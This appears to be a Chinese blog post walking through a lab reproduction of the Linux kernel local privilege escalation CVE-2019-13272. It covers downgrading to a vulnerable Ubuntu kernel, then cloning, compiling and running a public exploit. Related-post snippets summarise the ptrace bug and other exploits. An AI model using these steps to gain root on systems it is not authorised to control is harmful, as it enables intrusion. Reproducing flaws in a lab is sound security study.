小白复现 | CVE-2019-13272提权(Ubuntu本地提权)

于 2024-05-27 22:06:58 发布
阅读量212 收藏 2
点赞数 10
分类专栏: 内网 文章标签: 搜索引擎 网络安全 ubuntu linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/asanmaoa/article/details/139249109
版权

1.查看内核

 uname -a#发现内核版本为4.15.0

image.png


2.搜索内核版本

apt-cache search linux-image

image.png


3. 搜索指定内核

apt-cache search linux-image | grep "4.18.0.25"

image.png


4. 安装内核(使用通用签名内核镜像)

apt install linux-image-4.18.0-25-generic
出现报错

image.png


解决报错
rm /var/lib/dpkg/lock#删除/var/lib/dpkg/lock目录
执行apt install linux-image-4.18.0-25-generic


5.查看是否安装成功

grep menuentry /boot/grub/grub.cfg

image.png


6.修改引导

vim /etc/default/grub
修改之前

image.png


修改之后
wq #保存退出

image.png


7.更新引导配置文件

update-grub

image.png


8.安装git工具

sudo apt install git
报错

image.png


解决报错
rm /var/lib/dpkg/lock
执行apt install git

image.png


9.将CVE-2019-13272克隆到桌面

git clone https://github.com/jas502n/CVE-2019-13272.git

image.png


10.编译

gcc -s CVE-2019-13272.c -o pwned

gcc: error: CVE-2019-13272.c: No such file or directory#没有找到这个文件

gcc: fatal error: no input files

compilation terminated.

解决方法
cd ./CVE-2019-13272 需要进入到CVE-2019-13272目录下

image.png

image.png


11.执行pwned文件

./pwned

image.png

伏一
关注
  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-13272 exp
09-02
kernel 5.1.17之前版本中存在安全漏洞,该漏洞源于kernel/ptrace.c文件的ptrace_link没有正确处理对凭证的记录。攻击者可利用该漏洞获取root访问权限。由于  PTRACE_TRACEME允许的borked权限,利用bug在概念上很有趣。对象生命周期处理问题可能会导致内存损坏,但它需要以精确的方式进行代码竞争。事实PTRACE_TRACEME证明,除了父进程之外,内核还记录了跟踪器的凭据。研究人员概述的方案涉及一个父进程,该进程创建一个子进程,这个子进程会创建子进程。第一个子进程使用命令pkexec(用于以root身份运行程序),第二个子进程运行PTRACE_T
linux提权】内核本地提权漏洞(CVE-2019-13272
Kris__zhang的博客
05-11 1960
漏洞描述 kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve(可能允许攻击者控制)。 一个影响因素是对象寿命问题(也可能导致恐慌)。 另一个影响因素是将ptrace关系标记为特权,这可以通过(例如)Polkit的pkexec帮助程序与PTRACE_TRACEME进行利用。获取root权限。 只可在界面模式下利用,总体实际使用比较鸡肋 影响版本
CVE-2019-13272 Linux Kernel漏洞复现
墙角睡大觉的专栏
07-24 1397
日前,Linux官方发布一则通告, kernel 5.1.17之前版本中存在安全漏洞,该漏洞源于kernel/ptrace.c文件的ptrace_link没有正确处理对凭证的记录。攻击者可利用该漏洞获取root访问权限。由于PTRACE_TRACEME允许的borked权限,利用bug在概念上很有趣。对象生命周期处理问题可能会导致内存损坏,但它需要以精确的方式进行代码竞争。事实PTRACE_TRA...
CVE-2019-13272Linux本地内核提权
发哥微课堂
12-10 2067
介绍 在5.1.17之前的Linux内核中,kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve(可能允许攻击者控制)。 Linux执行PTRACE_TRACEME函数时,ptrace_link函数将获得对父进程凭据的RCU引用,然...
Linux本地内核提权漏洞复现(CVE-2019-13272)
m0_48520508的博客
01-19 776
0x00简介 在5.1.17之前的Linux内核中,kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve可能允许攻击者控制。 0x01漏洞概述 Linux执行PTRACE_TRACEME函数时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数,但是,对象struct cred的生存周期规则不允许无条.
DirtyCow提权漏洞复现CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
CVE-2020-0787本地提权
02-22
使用方法: 1.资源放到桌面 2.打开cmd 3.输入Exp.exe "cmd whoami > \\\\.\\pipe\\showme " show
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
CVE-2019-12814:CVE-2019-12814
05-26
**CVE-2019-12814:Jackson数据绑定库的远程代码执行漏洞** CVE-2019-12814是一个针对Java Jackson数据绑定库的重大安全漏洞,该漏洞允许攻击者通过恶意构造的JSON输入在解析过程中执行任意代码,从而可能导致系统...
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
linux 内核 expr6,漏洞预警|Linux内核本地提权漏洞分析(CVE-2019-13272)
weixin_29994587的博客
05-02 209
漏洞描述近日,HSCERT监测发现Linux修复了一个本地内核提权漏洞,利用此漏洞,攻击者可将普通用户权限提升为Root权限。HSCERT研判此漏洞为严重漏洞,攻击者拿到本地权限可以直接提权至root。漏洞分析当调用PTRACE_TRACEME时,ptrace_link()将获得对父级目标凭据的RCU引用,然后把该指针指向get_cred()函数。但是,对象struct cred的生存周期不允许无...
CVE-2019-13272 Linux kernel 权限许可和访问控制问题漏洞
Sylon的博客
08-02 1535
漏洞简介: Linuxkernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。 Linuxkernel5.1.17之前版本中存在安全漏洞,该漏洞源于kernel/ptrace.c文件的 ptrace_link没有正确处理对凭证的记录。攻击者可利用该漏洞获取root访问权限。 漏洞公告: 目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商 主页或...
linux漏洞类型,CVE-2019-13272
weixin_30663789的博客
05-13 331
// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)// Uses pkexec technique// ---// Original discovery and exploit author: Jann Horn// - https://bugs.chromium.org/p/project-zero/issue...
CVE-2019-13272
最新发布
08-23
CVE-2019-13272是一个Linux内核漏洞,该漏洞存在于ptrace_link函数中。这个函数在Linux执行PTRACE_TRACEME函数时,会获得对父进程凭据的RCU引用,并将该引用指向get_cred函数。然而,由于struct cred对象的生存周期规则,不允许无条件地将RCU引用转换为稳定引用。这个漏洞可以被利用来以特权身份执行恶意代码或提升权限。 关于该漏洞的更多详细信息和修复情况,请参考以下链接: <span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Linux本地内核提权漏洞复现(CVE-2019-13272)](https://blog.csdn.net/m0_48520508/article/details/112799843)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2019-13272Linux本地内核提权](https://blog.csdn.net/fageweiketang/article/details/103482899)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值